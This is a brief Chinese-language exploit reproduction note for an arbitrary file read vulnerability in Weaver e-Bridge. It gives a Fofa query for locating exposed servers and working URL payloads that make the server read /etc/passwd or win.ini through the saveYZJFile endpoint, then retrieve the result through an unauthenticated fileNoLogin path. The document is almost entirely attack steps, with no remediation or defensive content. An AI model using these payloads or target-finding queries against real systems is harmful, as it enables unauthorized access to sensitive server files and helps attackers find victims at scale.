1.资产查找
Fofa: title="泛微云桥 e-Bridge"
2.漏洞描述
泛微云桥e-Bridge存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。
3.漏洞复现
1)Linux服务器
(1)在URL后添加payload
payload:/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
(2)在URL后添加/file/fileNoLogin/上一步返回的id
payload:/file/fileNoLogin/fa38f21af951482bb450d1ce3e6a7b49
2)Windows服务器
(1)在URL后添加payload
payload :/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C://windows/win.ini&fileExt=txt
(2)在URL后添加/file/fileNoLogin/上一步返回的id
payload:/file/fileNoLogin/9ecccbde436e4d3d8d34ef63274d4d4d